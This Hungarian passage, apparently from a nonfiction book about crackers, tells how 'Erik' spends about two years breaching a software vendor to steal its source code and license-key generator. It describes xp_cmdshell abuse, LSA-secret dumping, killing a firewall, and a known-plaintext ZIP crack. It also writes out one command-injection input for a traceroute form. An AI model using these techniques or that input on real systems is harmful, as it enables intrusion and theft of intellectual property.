Jellemzően három motivációs tényező ösztönzi a crackert, hogy
utánajárjon egy adott terméknek:
Olyan szoftvert szerezzen meg, amely különösen érdekli, és amelyet
közelebbről meg akar vizsgálni.
Megküzdjön egy kihívással és kiderítse, hogy le tudja-e győzni
nemes ellenfelét (általában a fejlesztőt), hasonlóképpen ahhoz, ahogy
egy sakkozó, egy bridzs– vagy egy pókerjátékos megpróbál túljárni az
ellenfele eszén.
Felrakja a szoftvert, hogy az mások számára is elérhető legyen egy
az értékes szoftvereket ingyenessé tevő titkos online világban. A
crackerek nem csak a szoftvert magát kívánják megszerezni, hanem a
licenckulcsot generáló kódot is.
Mindkét történet szereplői azért támadták a célba vett
szoftvergyártókat, hogy a forráskód ellopása után patch-et vagy
kulcselőállító eszközt („keygen”) adjanak közre, amelyek a vásárlói
licenckulcsok létrehozására használt saját fejlesztésű kódok. Ezek
segítségével a crackercsoportok lényegében ingyenesen használhatják
az adott szoftvert. Sok olyan hackelési ismeretekkel rendelkező ember
van, aki ezzel foglalkozik, és a szoftvervállalatoknak fogalmuk sincs
arról, hogy milyen keményen dolgoznak ezen. A crackerek sötét, jól
elrejtett világban élnek, ahol a siker fokmérője a lopott szoftver – a
szellemi tulajdon oly lépékű eltulajdonítása, amit a kedves olvasó
minden valószínűséggel megdöbbentőnek és rémítőnek fog találni. A
történet utolsó mozzanatát a fejezet vége felé, a Megosztás: A cracker
világa című részben ismertetjük.

A KÉTÉVES HACKELÉS

Erik egy a harmincas éveiben járó biztonsági tanácsadó, aki arra


panaszkodik, hogy „amikor egy sebezhetőséget jelentek, gyakran
hallom azt, hogy Ez semmiség. Miért olyan nagy dolog ez? Mit tud ez
okozni?” Története egy sokszor figyelmen kívül hagyott igazságot
mutat be: nem csak a nagy hibák tehetnek tönkre.
Az itt leírtak egyes részei nehezen követhetőnek tűnnek majd a
hackerek által használt megközelítésekről korlátozott műszaki
ismerettel rendelkező olvasók számára. A történetben azonban az a
lenyűgöző, hogy az oly sok hackerre jellemző állhatatosságot emeli ki.
Az ehhez kapcsolódó – és nem is olyan régen lejátszódó – események
úgy mutatják be Eriket, mint – ahogy a könyv szereplői közül oly
sokan – aki napközben egy a vállalatoknak az információs értékeik
védelmében segítő etikus hacker, éjszaka azonban a gyanútlan
célpontok feltörésének izgalmában lubickol.
Erik a hackerek azon különleges vállfájába tartozik, akik kiszemelik,
hogy hova fognak betörni, majd mindaddig ragaszkodnak a feladathoz,
amíg siker nem koronázza próbálkozásaikat... még ha ez hónapokig
vagy évekig tart is.

Vizsgálat indul

Néhány évvel ezelőtt Erik és néhány tőle messze lakó


hackercimborája különböző típusú szerverszoftvereket gyűjtöttek, és
eljutottak addig a pontig, hogy az adott kategória minden komolyabb
termékének a forráskódja a „birtokukban volt”... egyetlen kivételével. –
Ez volt az egyetlen, ami nem volt meg – meséli és nem tudom miért, de
nagykőn érdekes volt számomra a gondolat, hogy feltörjem azt is. –
Tökéletesen megértem a hozzáállását. Erik trófeákra vadászott, és
minél értékesebb a cél, annál nagyobb a trófea.
Ez az utolsó, még hiányzó darab sokkal nagyobb kihívásnak
bizonyult, mint gondolta. – Vannak olyan rendszerek, amelyekbe be
akarok törni, azonban valamilyen oknál fogva igen bonyolultnak
bizonyulnak – mondja egyszerűen. Ezt a hozzáállást is jól ismerem.
A szokásos módon indult el, „portszkennelést végeztem a
webszerveren, jellemzően ez az első dolog, amit megnézek, amikor
webszerverekbe akarok betörni. Általában több biztonsági
hiányosságot is találok. Most azonban semmi nem volt.” A célpont
ilyen egyszerű próba alá vetése gyakori kiindulópontja a támadásnak,
amikor a támadó el akarja kerülni, hogy riadókészültséget váltson ki,
vagy egy rendszergazda a naplók bejegyzései miatt észrevegye –
különösen napjainkban, amikor számtalan cég használ behatolásészlelő
rendszereket a portszkennelések és a támadók által gyakran használt
egyéb próbálkozások észlelésére.
Erik számára „van néhány keresendő port, amelyekről tudom, hogy
érdekes célpontok lesznek”, és gyorsan elhadarja a webszerver, a
terminálszolgáltatások, a Microsoft SQL szerver, a Microsoft virtuális
magánhálózat (VPN), a NetBIOS, a levelezőszerver (SMTP) és néhány
egyéb szolgáltatás által használt portok számának listáját.
Egy Windows-os szerveren az 1723-as portot (ahogy azt 7., A
bankja természetesen biztonságos, ugye? című fejezetben is említettük)
általában a pont-pont alagút (point-to-point tunnel) néven ismert
protokoll használja, amely a VPN kommunikáció Microsoftos
megvalósítása, és amely Windows alapú hitelesítést használ. Erik úgy
találta, hogy az 1723-as port kipróbálása „ötletet ad arra vonatkozóan,
hogy milyen szerepet játszik a szerver”, és „néha próbálkozhatsz a
jelszavak kitalálásával vagy brute-force támadással történő
megfejtésével”.
Ennél a pontnál még csak meg sem kísérelte elrejteni
személyazonosságát, mivel „olyan sok portszkennelést kap [egy cég]
nap mint nap, hogy senki nem törődik vele. Egy portszkennelés a napi
százezer közül semmit nem jelent.”
(Erik értékelése az észrevétel és az esetleges azonosítás alacsony
kockázatáról azon a kockázatos feltételezésén alapul, hogy
portszkenneléseit elnyomja az Internet „zaja”. Valóban, a célba vett
társaság hálózati rendszergazdája valószínűleg túlterhelt vagy túl lusta
a naplók áttanulmányozásához, azonban mindig fennáll a veszélye
annak, hogy egy buzgó típusba fut bele, és lebukik. Ez olyan veszély,
amit az óvatosabb hackerek nem hajlandók vállalni.)
Hiába volt a kockázatvállalás, mén a portszkennelések jelen esetben
semmi hasznosat nem derítettek ki. Ekkor egy egyedileg létrehozott kis
szoftverrel, amely leginkább egy közös átjáró interfész (common
gateway interface – CGI) letapogatóként működött, talált egy a
„WS_FTP szerver” által létrehozott naplófájlt, amely egyebek között a
szerverre feltöltött fájlok nevének listáját tartalmazta. Hasonló volt
bármely másik FTP (File Transfer Protocol – Fájl-átviteli Protokoll)
naplóhoz, mondja Erik, „azt leszámítva, hogy a napló minden olyan
könyvtárban el volt tárolva, ahova fájlok voltak feltöltve”, így amikor a
naplóban egy olyan fájlt talált kilistázva, amelyik érdekesnek tűnt, az
egyből ott is volt – nem kellett vadászni rá.
Erik elemezte az FTP naplót, és megtalálta azon fájlok nevét,
amelyeket nemrégiben töltöttek fel az „/include” könyvtárba, egy olyan
könyvtárba, amit általában az „.inc” fájltípusú állományok tárolására
használnak – ezek más fő forráskódmodulból származó gyakori
programozási funkciók. Windows 2000 alatt nincsenek
alapértelmezésből védve ezek a fájlok. A naplóban levő fájlnevek
listájának áttekintése után Erik az Internet böngészőjét használta az
olyan fájlnevek forráskódjának megtekintésére, amelyekről azt
gondolta, hogy értékes információkat tartalmazhatnak. Különösképpen
olyan fájlok után kutatott, amelyek a backup (biztonsági mentést
tartalmazó) adatbázisszerver jelszavait tartalmazta. És véletlenül
megütötte a főnyereményt.
– Eddig a pontig – mondta Erik talán tíz próbálkozást hajtottam
végre a webszerveren – tudod, semmi lényeges nem volt a naplókban.
– Noha az adatbázishoz tartozó jelszavak felfedezése izgalmasnak tűnt,
gyorsan rájött, hogy azon a gépen nem volt adatbázisszerver.
De a dolgok innen „izgalmassá” váltak.
Semmit nem találtam azon a webszerveren, volt azonban egy általam
készített [szoftver] eszközöm, amely a gyakori hostnevek listája alapján
próbál bostneveket kitalálni – mint példáid a gateway, backup, test, és
így tovább, plusz a domainnév. A gyakori hostnevek listáján
végigmenve próbál meg létezőbostneveket azonosítani a tartományban.
Az emberek igen kiszámíthatóak [amikor bostneveket választanak],
így elég egyszerű megtalálni a szervereket.
A szerverek megtalálása valóban elég könnyű volt, azonban Eriket
ez sem vitte előbbre. Ekkor hirtelen eszébe jutott; a cég nem az
Egyesült Államokban van.
Így „az adott ország kiterjesztését használtam, és megpróbálkoztam
azokkal a hostokkal, amelyeket a hostnévletapogató eszközzel
találtam.” Egy japán cég esetében ez például így nézne ki:
hostnév.cégnév.com.jp
Ez elvezette egy backup web– és levelezőszerverhez. A szerverhez
az „include” (,inc) forrásfájlokban talált jelszavakkal fért hozzá. Képes
volt parancsokat kiadni egy olyan általános rendszereljárással (xp
cmdshell), amely lehetővé tette számára, hogy bármilyen felhasználó
alatt fusson is az SQL szerver, shellparancsokat futtathasson. Ráadásul
az SQL szerver privilegizált fiók alatt futott. Győzelem! Ezzel teljes
hozzáférést szerzett a web/levelezőszerverhez.
Erik azonnal folytatta a könyvtárakban való keresést, forráskódok és
egyéb finomságok biztonsági mentései után kutatva. Fő célja a keygen
megszerzése volt – mint említettük, ez a vásárlói licenckulcsok
létrehozására használt saját fejlesztésű kód. Első feladata az volt, hogy
minél több információt gyűjtsön a rendszerről és felhasználóiról. Erik
tulajdonképpen egy Excel munkalapot használt az általa megtalált
érdekes információk, így a jelszavak, IP-címek, hostnevek és a nyitott
portokon keresztül elérhető szolgáltatások stb. rögzítésére.
Az operációs rendszer olyan rejtett részeivel is megpróbálkozott,
amivel az amatőr támadó általában nem foglalkozik, például a helyi
biztonsági szervezet (Local Security Authority – LSA) titkaival,
amelyek a szolgáltatásjelszavakat, a gépre utoljára bejelentkezett
felhasználók cache-elt jelszóhash-eit, távoli elérés szolgáltatások
(Remote Access Services – RAS) betárcsázási fiókneveit és jelszavait,
a tartomány elérésére használt munkaállomások jelszavait és sok egyéb
mást tartalmaznak. A védett tároló (Protected Storage) területet is
megnézte, ahol az Internet Explorer és az Outlook Express a
jelszavakat tárolja.[1]
Következő lépése a jelszavak megszerzése érdekében a jelszóhash-
ek kivonatolása és feltörése volt. Mivel a szerver egy backup
tartományvezérlő, levelezőszerver és másodlagos Domain Name
Service (DNS) szerver volt, a cég által használt domain– és hostnevek
teljes listáját tartalmazó DNS kezelő panel megnyitásával minden DNS
forrásrekordhoz (így többek között a hostnevek-hez és az azokhoz
tartozó IP-címekhez is) hozzáfért.
Most már kezemben volt az összes hostjuk listája, és rendszerről
rendszerre ugrálva gyűjtögettem a jelszavakat.
Ezt az „ugrálást” a backup webszerveren levő jelszavaknak a
feltörése tette lehetővé, ami viszont az Erik által korábban megszerzett
Microsoft SQL jelszó felhasználásával sikerülhetett.
Még mindig nem tudta, hogy mely szerverek voltak a termék
forráskódját és a licenckezelő kódot tartalmazó alkalmazásfejlesztő
gépek. Jelek után kutatva tüzetesen megvizsgálta a levelező és
webnaplókat, olyan tevékenységmintákat keresve, amelyek segítenek a
gépek azonosításában. Amint összegyűjtötte a naplókból az érdekesnek
tűnő egyéb IP-címek listáját, célba vette ezeket a gépeket. Ennél a
pontnál egy fejlesztő munkaállomása volt a hőn áhított cél, mivel a
fejlesztők valószínűleg hozzáférnek a teljes forráskódhoz.
Innentől néhány hónapig vakvágányra került. A jelszavak gyűjtésén
túlmenően nem sok sikert ért el, „csak hébe-hóba letöltögettem némi
hasznosnak tűnő információt”.

Az ügyvezető számítógépe

Ez ment úgy nyolc hónapig, miközben türelmesen „ugrált szerverről


szerverre” anélkül, hogy akár a forráskódot, akár a licenckulcsot
előállító kódot megtalálta volna. Ám ekkor jött az áttörés. Elkezdte
közelebbről vizsgálni az elsőként feltört biztonsági másolatot
tartalmazó webszervert, és felfedezte, hogy az tárolja az e-mailjeiket
bármikor visszakereső felhasználók naplóit, amelyek viszont ezeknek
az alkalmazottaknak a felhasználói nevét és IP-címét tartalmazzák. A
naplók megvizsgálásával sikerült kiderítenie az ügyvezető IP-címét.
Végre sikerült egy értékes célpontot azonosítania.
Végül megtaláltam az ügyvezetőszámítógépét, és igen érdekes dolog
történt. Néhány napig portszkennelést hajtottam rajta végre, és
egyszerűen nem jött válasz, pedig tudtam, hogy a számítógépe ott van.
Láttam az e-mailek fejlécében, hogy fix IP-címet használ, de soha nem
volt ott.
Így végül megpróbáltam portszkennelést végrehajtani a gépén,
kétóránként csupán néhány gyakran használt portot ellenőrizve
próbáltam a radar alatt maradni, attól tartva, hogy valamilyen
behatolásészlelőszoftvert futtat. Különbözőnapszakokban
próbálkoztam, azonban minden 24 órás időszakban legfeljebb 5 portra
korlátoztam a vizsgálódást.
Eltartott néhány napig, míg sikerült nyitott portot találnom olyankor,
amikor ott volt. Végül egy nyitott portot találtam a gépén – az 1433-
ast, amely az MS SQL szerver egyik példányát futtatta. Kiderült, hogy a
laptopja volt, és minden reggel körülbelül csak két óráig volt fenn.
Szóval bejött az irodájába, ellenőrizte az e-mailjeit, majd elment, vagy
egyszerűen csak kikapcsolta a laptopját.

Bejutás az ügyvezető számítógépébe

Erik ekkorra már körülbelül 20-30 jelszót összegyűjtött a cégnél. –


Jó, erős jelszavaik voltak, azonban bizonyos sémákat követtek. És
amint felismertem a sémáikat, könnyedén kitalálhattam a jelszavakat.
Erik úgy becsüli, hogy ekkor már körülbelül egy teljes éve dolgozott
ezen a munkán. És ekkor erőfeszítéseit komoly áttörés jutalmazta.
Erik eljutott arra a pontra, hogy úgy érezte, markában van a cég
jelszóstratégiája, így visszatért, hogy a jelszót kitalálva ismét
megpróbáljon megbirkózni az ügyvezető számítógépével. Mitől hitte
azt, hogy képes lesz kitalálni az ügyvezető által az MS SQL szerverhez
használt jelszót?
Az az igazság, tudod, hogy nem tudom elmagyarázni. Egyszerűen
egy képesség, hogy ki kell találnom az emberek által használt
jelszavakat.
Azt is tudom, hogy milyen fajta jelszavakat fognak használni a
jövőben. Egyszerűen érzékem van hozzá. Érzem. Olyan, mintha helyet
cserélnénk, és megmondanám, hogy milyen jelszót használnék, ha én
lennék ők.
Nem biztos abban, hogy szerencsének vagy tudásnak kell hívni, és
annyival le is zárja ezt a témát, hogy „jó tippelő vagyok”. Akármi is a
magyarázat, végül sikerült előállnia a megfelelő jelszóval, ami emlékei
szerint „nem szótári szó volt, hanem valami bonyolultabb”.
Mindenesetre megszerezte a jelszót, ami adatbázis-kezelő
rendszergazdai hozzáférést biztosított számára az SQL szerverhez.
„Birtokba vette” az ügyvezetőt.
Azt találta, hogy a számítógép kellően védett volt egy tűzfal által, és
csak egy portja volt nyitva. Más módszerekkel azonban Erik egy
csomó dolgot talált, amiben kutakodhatott. – A rendszere igazán
zűrzavaros volt. Semmit nem találtam ott. Úgy értem, mindenhol csak
fájlok voltak. – Nem értvén az idegen nyelvet, amiben a legtöbb
dokumentum íródott, Erik online szótárakat és a „Babblefish” nevű
ingyenes online fordítószolgáltatást használva kulcsszavak után
vadászott. Volt egy barátja, aki beszélte a szóban forgó nyelvet, és ez is
segítség volt. A chatnaplókban még további IP-címeket és jelszavakat
talált.
Mivel a laptopon levő fájlok túlzott összevisszaságban voltak ahhoz,
hogy valami értékeset találjon, Erik egy másfajta megközelítéssel állt
elő, és a „dir/s/od <meghajtó betűjele>” paranccsal dátum szerint sorba
rendezve kilistázta az összes fájlt, így meg tudta állapítani, hogy
melyikhez fértek hozzá mostanában, és offline megvizsgálhatta azokat.
A folyamat során felfedezett egy Excel munkafüzethez tartozó sokat
sejtető nevet, amely munkafüzet különböző szerverek és alkalmazások
jelszavait tartalmazta. Ebből sikerült az elsődleges DNS szerverhez
tartozó egy érvényes fióknevet és jelszót azonosítania.
A következő lépései megkönnyítése érdekében, illetve azért, hogy
lábát jobban megvethesse és könnyebben tölthessen fájlokat fel és le,
az ügyvezető laptopjára akarta vinni hackeres eszköztárát. Csak a
Microsoft SQL szerver kapcsolatán keresztül volt képes kommunikálni
a laptoppal, azonban a korábban említett eljárással parancsokat tudott
küldeni az operációs rendszernek, mintha csak a Windows DOS
parancssora előtt ülne. Erik írt egy kis szkriptet, amely a
hackereszközei letöltésére utasította az FTP-t. Amikor harmadik
kísérletére sem történt semmi, egy már a laptopon levő, „pslist” nevű
parancssori programot használt a futó folyamatok kilistázására.
Nagy hiba volt!
Mivel az ügyvezető laptopján a saját személyi tűzfala futott (Tiny
Personal Firewall), az FTP használatára vonatkozó minden kísérletnél
egy figyelmeztető ablak jelent meg az ügyvezető képernyőjén, és
engedélyt kér az Internethez való kicsatlakozásra. Szerencsére az
ügyvezető a folyamatok kezelése érdekében már letöltötte a
www.sysinternals.com oldalról a parancssori eszközök egy gyakran
használt halmazát. Erik a „pskill” segédalkalmazást használta a
tűzfalprogram kilövésére, így a felbukkanó párbeszédablakok korábban
eltűntek, mint az ügyvezető láthatta volna őket.
Erik ismét úgy gondolta, hogy bölcsebb lenne néhány hétig lapítani,
hátha valaki felfigyelt a tevékenységére. Amikor visszatért, más
taktikával próbálta meg az ügyvezető laptopjára feljuttatni az eszközeit.
Egy szkriptet írt ehhez, amely egy „Internet Explorer objektumot”
használva átverte a személyi tűzfalat, hogy az azt higgye, hogy az
Internet Explorer kér engedélyt az Internethez való csatlakozásra.
Majdnem mindenki teljes hozzáférést engedélyez az Internet
Explorernek a személyi tűzfalán keresztül (gondolom, ön is, kedves
olvasó), és Erik arra számított, hogy a szkriptje képes lesz ezt
kihasználni. Jól gondolta. Működött. Használni tudta eszközeit, így
elkezdhette a keresést a laptopon, és az információk leszedését.

Az ügyvezető kifigyeli a betörést

Ezek a módszerek, mondja Erik, ma is működnének.


Egy későbbi alkalommal, amikor az ügyvezető gépéhez csatlakozott,
Erik ismét kilőtte a tűzfalat, hogy egy másik rendszerre továbbíthassa a
fájlokat, ahonnan képes volt letölteni őket. Eközben észrevette, hogy az
ügyvezető a számítógépénél volt, és észrevette, hogy valami különös
történik. – Látta, hogy a tűzfal ikonja hiányzik a tálcáról. Látta, hogy
fenn vagyok. – Erik azonnal kilépett. Néhány perc múlva a laptopot
újraindították, és a tűzfal ismét elindult.
Nem tudom, hogy tudott-e rólam. Ezért ismét vártam néhány hetet,
mielőtt visszamentem és újból próbálkoztam. Végül megismertem a
munkavégzési szokásait, tudtam, hogy mikor juthatok be a rendszerébe.

Hozzáférés szerzése az alkalmazáshoz

Miután egy ideig lapított és átgondolta a stratégiáját, Erik visszatért


az ügyvezető laptopjára, és elkezdte tüzetesebben vizsgálni a rendszert.
Először egy nyilvánosan elérhető, LsaDump2 nevű parancssori eszközt
futtatott a registry Local Security Authority Secrets nevű különleges
részén tárolt bizalmas információ továbbítására. Az LSA Secrets a
szolgáltatásfiókok nyíltszöveges jelszavait, az utolsó 10 felhasználó
cache-elt jelszóhash-eit, FTP és webfelhasználói jelszavakat, illetve a
betárcsázós csatlakozás fiókneveit és jelszavait tartalmazza.
A „netstat” parancsot is futtatta, hogy lássa, aktuálisan milyen
kapcsolatok vannak létrehozva és milyen portok várnak csatlakozásra.
Észrevette, hogy egy magas számú port bejövő kapcsolatra várt. A
korábban feltört backup szerverről a nyitott portra csatlakozva rájött,
hogy az valamilyen levelező interfészként használt leegyszerűsített
webszerver. Gyorsan felismerte, hogy ki tudja kerülni a levelező
interfészt, és bármilyen fájlt képes a levelező interfészhez használt
szerver gyökérkönyvtárába helyezni. Akkor könnyedén letöltheti majd
a fájlokat az ügyvezető laptopjáról a backupszerverre.
Az egy év alatt elért apróbb sikerek ellenére Eriknek még mindig
nem volt meg a termék forráskódja vagy a kulcsot előállító kód. Ennek
ellenére meg sem fordulat a fejében, hogy feladja. Tulajdonképpen
csak most kezdtek érdekessé válni a dolgok. – Az ügyvezető laptopján
megtaláltam az Eszközök könyvtár egy biztonsági mentését. Volt benne
egy interfész a kulcselőállítóhoz, azonban nem volt hozzáférése az élő
adatbázishoz.
Nem találta még meg a licencelőszervert, amely az összes vásárlói
kulcsot tartalmazó élő adatbázist futtatta – csak valamit, ami arra
mutat. – Nem tudtam, hogy a tényleges licencelő eszközök hol
helyezkedtek el. Meg kellett találnom az élő szervert. – Volt egy olyan
érzése, hogy ugyanazon a szerveren volt, mint a levelezőszerverük,
hiszen a cég olyan weboldalt üzemeltetett, amelyen az ügyfelek
azonnal megvásárolhatták a szoftverterméket. Amint a hitelkártya-
tranzakciót jóváhagyták, az ügyfél kapott egy e-mailt, benne a
licencelő kulccsal. Csak egy szerver maradt, amit Erik nem talált még
meg és nem tudott feltörni; ez kellett hogy tárolja a licencelő kulcsot
előállító alkalmazást.
Ekkorra Erik már hónapokat töltött a hálózatban, és még mindig nem
szerezte meg, amit keresett. Elhatározta, hogy körülszaglássza a
korábban feltört backupszervert, és a már „birtokában levő”
szerverekről a portok szélesebb tartományát vizsgálva elkezdte
letapogatni a levelezőszerven, remélve, hogy futó szolgáltatásokat talál
nem szokványos portokon. Arra is gondolt, hogy egy megbízható
szerverről lenne a legjobb letapogatni, hátha a tűzfal csak bizonyos IP-
címeket enged át.
A következő két hétben a lehető legcsendesebben letapogatta a
hálózatot szokatlan szolgáltatások, illetve a gyakori szolgáltatásokat
nem szokványos portokon futtató szerverek azonosításának
reményében.
Miközben folytatta portszkennelő tevékenységét, Erik elkezdte a
rendszergazda és néhány más felhasználó Internet Explorer
előzményfájljait vizsgálni. Ez új felfedezésre vezette. A backupszerver
felhasználói a fő levelező szerver egy magas számú portjához
csatlakoztak az Internet Explorert használva. Arra is rájött, hogy a fő
levelezőszerver blokkolta az ehhez a magas számú porthoz való
hozzáférést, kivéve, ha a csatlakozás egy „jogosult” IP-címről jött.
Végül talált egy webszervert egy magas számú porton – „1800-as
vagy valami ilyesmi”, így emlékszik –, és sikerült kitalálnia egy olyan
felhasználói név és jelszó kombinációt, amely egy menüt hozott fel. Az
egyik menüpont a vásárié információk megtekintése volt. Egy másik a
licencelő kulcsok létrehozása a termékhez.
Bingo!
Ez volt az élő adatbázist tartalmazó szerver. Erik érezte, hogy
felszökik az adrenaliszintje, amikor rájött, hogy közeledik a céljához.
De „ez a szerver kemény volt, hihetetlenül kemény”. Megint
zsákutcába futott. Visszavonult, átgondolta a dolgokat, és egy új ötlettel
állt elő:
A weboldal az ügyvezetőlaptopján talált biztonsági mentésének
köszönhetően megvolt ezeknek a weboldalaknak a forráskódja. És a
weboldalon találtam egy linket, amely bizonyos hálózati diagnosztikai
funkciókra mutatott, így például a netstatra, a traceroute-ra és a
pingelésre – beviszel egy IP-címet a webes űrlapba, az OK gombra
kattintasz, az lefuttatja a parancsot és kiírja a képernyőre az
eredményeket.
Észrevett egy hibát az egyik, a weboldalra való bejelentkezéskor
futtatható programban. Ha a tracert parancsot választotta ki, az a
program traceroutc végrehajtását tette számára lehetővé – a csomagok
a cél IP-cím eléréséhez használt útvonalának lekövetését. Erik
felismerte, hogy át tudja verni a programot, hogy az egy shell parancsot
futtasson, ha beír egy IP-címet, utána az szimbólumot, majd a kívánt
shell parancsot. Ezért a következő sorhoz hasonló valamit írt be:
localhost > nul && dir c:\par
Ebben a példában az űrlapba bevitt információ a CGI szkipt által
utólagosan hozzáadódik a traceroute parancshoz. Az első rész (az
szimbólumig) azt mondja a programnak, hogy adjon ki magára egy
traceroute parancsot (ami teljesen értelmetlen), majd irányítsa át az
outputot a semmibe, aminek következtében, az output „a lomtárba
kerül” (vagyis nem megy sehova). Amint a program végrehajtja az első
parancsot, az „&&” szimbólumok jelzik, hogy van még egy
végrehajtandó shell parancs. Jelen esetben a parancs arra szolgált, hogy
megjelenítse a C meghajtó gyökérkönyvtárában levő tartalmat – ez
különösen hasznos a támadónak, mivel lehetővé teszi számára, hogy
annak az fióknak a jogosultságával hajtson végre tetszőleges shell
parancsokat, amely alatt a webszerver éppen fut.
– Minden szükséges hozzáférést megadott nekem – mondja Erik. –
Mindenhez hozzáfértem, ami csak a szerveren volt.
Erik hirtelen elfoglalt lett. Hamarosan észrevette, hogy a cég
fejlesztői minden este felrakják a szerverre forráskódjuk biztonsági
másolatát. – Rengeteg volt a teljes biztonsági mentés úgy 50 mega
körül lehetett. – Parancsok sorozatát kiadva képes volt bármely fájlt a
webszerver gyökérkönyvárába továbbítani, majd az elsőként feltört
gépre, a backup webszetrverre letölteni őket.

Megvagy!

Az ügyvezetős incidens nagyon meleg volt. Az ügyvezető nyílván


gyanút fogott, de feszített munkarendjének és Erik egyre növekvő
óvatosságának köszönhetően később nem vett észre semmit. Azonban
ahogy egyre beljebb és beljebb hatolt a cég rendszerébe, úgy lett
Eriknek egyre nehezebb megőriznie láthatatlanságát. Gyakran az alább
elmondott dolog az ára annak, hogy a hacker kitolja a határokat,
miközben már hosszú ideje jelen van az idegen rendszerben. Éppen
elkezdte letölteni a régóta keresett program forráskódját...
Körülbelül a felénél jártam, amikor észrevettem, hogy leállt a
letöltésem. Belenéztem a könyvtárba, és azt láttam, hogy eltűnt a fájl
Elkezdtem a naplófájlok és a módosított dátumok némelyikét
vizsgálgatni, és rájöttem, hogy ekkor a fickó a szerveren volt, és a
naplófájlokat nézetgette. Tudta, hogy csinálok valamit – lényegében
elkapott engem.
Akárki is vette észre Erik jelenlétét, nem vesztegette az időt, és
gyorsan letörölte a kritikus fájlokat. A játék véget ért... vagy mégsem?
Erik bontotta a kapcsolatot, és egy hónapig nem ment vissza.
Ekkorra már sok hónapon át küzdött azért, hogy megszerezze a
szoftvert, és azt gondolhatnánk, hogy igencsak elkeseredett. Egyáltalán
nem, mondja.
Soha nem válók frusztrálttá, hiszen nagyobb a kihívás. Ha nem
sikerül elsőre, csak érdekesebb a dolog. Egyáltalán nem idegesítő.
Olyan, mint egy videojáték, ahol szintről szintre, kihívásról kihívásra
kell haladnod. Ez egyszerűen a játék része.
Erik a kitartás sajátos formáját gyakorolja – úgy véli, hogy a kellő
állhatatosság mindig kifizetődő.
Ha az egyik dolog nem működik, megpróbálkozom valami mással,
mert tudom, hogy van valami, ami működni fog. Mindig van valami,
ami működik. Csak meg kell találni, hogy mi az.

Vissza az ellenséges területre

E kellemetlenség után úgy egy hónappal később megint ott volt az


ügyvezető számítógépéhez csatlakozva, és a chatnaplót tanulmányozta
(elmentette a chatnaplóit), hogy lássa, volt-e bármi feljegyzés arról,
hogy valaki jelentette a hackelést. Mivel pontosan emlékezett a napra
és időpontra, amikor észrevették a cégnél, Erik ennek megfelelően
vizsgálta át a naplót. Semmilyen említést nem talált hackerről vagy
jogosulatlan letöltési kísérletről. Megkönnyebbülten sóhajtott.
Nagyon nagy szerencséje volt, ugyanis az incidensével majdnem egy
időben vészhelyzet volt a cég egyik ügyfelénél. Az informatikus fickó
– bármit is csinált éppen – abbahagyta azt, hogy ezzel a helyzettel
foglalkozhasson. Erik talált egy későbbi bejegyzést, hogy a fickó
leellenőrizte a naplókat, és futtatott egy vírusellenőrzést, ennél többet
azonban nem tett. – Úgy tűnt, hogy gyanúnak találta a dolgot. Kicsit
utánanézett, de nem tudta megmagyarázni – ezért hagyta az egészet.
Erik visszavonult, és várt, hogy még több idő teljen el, majd
visszatért, azonban még elővigyázatosabb lett, és csak a munkaidőn
kívüli órákban vizsgálódott, amikor viszonylag biztos lehetett benne,
hogy senki sincs ott.
Apránként letöltötte a forráskód teljes fájlját, az átvitelt egy idegen
országban elhelyezkedő köztes szerveren futtatva keresztül – amire jó
oka volt, hiszen mindent a saját otthonából csinált.
Erik olyan szófordulatokkal írta le, hogy milyen alaposan ismerte a
cég hálózatát, hogy az elsőre gyanúsan nagyképűnek tűnhetett, azonban
ha belegondolunk, hogy mennyi időt töltött el a cég rendszerének
számtalan be– és kilépési pontja után kutatva, egykenként vizsgálva
őket, amíg a legrejtettebb titkaikat és sajátosságaikat is kiderítette,
állítása minden bizonnyal a szavahihetőség határain belül marad.
Sokkal jobban ismertem a hálózatukat, mint bárki más. Ha
problémáik lettek volna, valószínűleg mindenkinél jobban meg tudtam
volna oldani azokat. Úgy értem, alaposan ismertem a hálózatuk
minden külsőés belsőrészét.

Még mindig nem

Erik végre biztonságosan letöltötte saját számítógépére a


szerverszoftvert... az azonban nem olyan formában volt, hogy meg
tudta volna nyitni és tanulmányozni. Mivel a szoftver olyan hatalmas
volt, a backupszerveren azt eltároló fejlesztő betömörítette és
titkosította a ZIP-fájlt. Először egy egyszerű ZIP jelszófeltörő
programmal próbálkozott, de azzal nem járt sikerrel. Eljött a B terv
ideje.
Erik egy új és továbbfejlesztett, PkCrack nevű jelszófeltörő
programot hívott segítségül, amely az „ismert nyílt szövegű
támadásnak” nevezett technikát használja. Az eszköznek mindössze a
titkosított állomány részét képező bizonyos mennyiségű nyílt szöveges
adatra van szüksége a tömörített anyagban levő fájlok titkosításának
feltöréséhez.
Megnyitottam a ZIP-fájlt, és találtam „logo.tif” nevű fájlt, így
elmentem a főweboldalukra, és „logo.tif nevű fájlok után kutattam.
Mindegyiket letöltöttem és betömörítettem, és azt találtam, hogy az
egyik ellenőrzőösszege (checksum) megegyezett a védett ZIP-fájlban
levőével
Eriknek most már megvolt a védett ZIP-fájlja és a „logo.tif” fájlnak
a nem védett változata. A PkCracknek mindössze öt percébe került,
hogy összehasonlítsa a fájl e két változatát, és kiderítse a jelszót. A
jelszóval gyorsan kitömörítette az összes fájlt.
Több száz hosszú éjszaka után Erik végre megszerezte a teljes
forráskódot, amire ácsingózott. Arról, hogy mi tartotta benne a lelket
ilyen sokáig, Erik a következőt mondta:
Ó, egyszerű, az egész arról szól, hogy vonzott. Szeretem a
kihívásokat, és szeretem, ha nem vesznek észre. Szeretem a dolgokat
különbözően, és főként nagyon csendesen csinálni. Szeretem megtalálni
a legkreatívabb utakat. Persze, könnyebb feltölteni egy szkriptet; de az
én módszerem sokkal királyabb volt. Ha meg tudod állni, akkor ne ki_tt
szkriptkölyök legyél – hanem hacker.
És hogy mit csinált a szoftverrel és a kulcselőállítóval? A válasz az,
hogy ó és Robert, a következő történet hőse, ugyanazt a crackerek
világában nagyon gyakori utat követik. A történetet a fejezet vége felé
a Megosztás: a cracker világa című részben olvashatjuk.

ROBERT, A SPAMMER BARÁTJA

A távoli Ausztráliában él egy másik „becsületes” úriember, aki


nappal elismert biztonsági szakember, éjszaka azonban fekete kalapos
hackerré válik, és szaktudását, amelyből a fizetését szerzi, a világ
legnagyobb szoftvercégei elleni hackelésekre fordítja.
Azonban ez a férfi, Robert, nem könnyen skatulyázható be egyetlen
kategóriába sem. Túl összetett személyiségnek tűnik ehhez – az egyik
hónapban egy szoftvert hackel meg a saját szórakozására és a kihívás
iránti vágya kielégítésére, majd a következő hónapban olyan feladatot
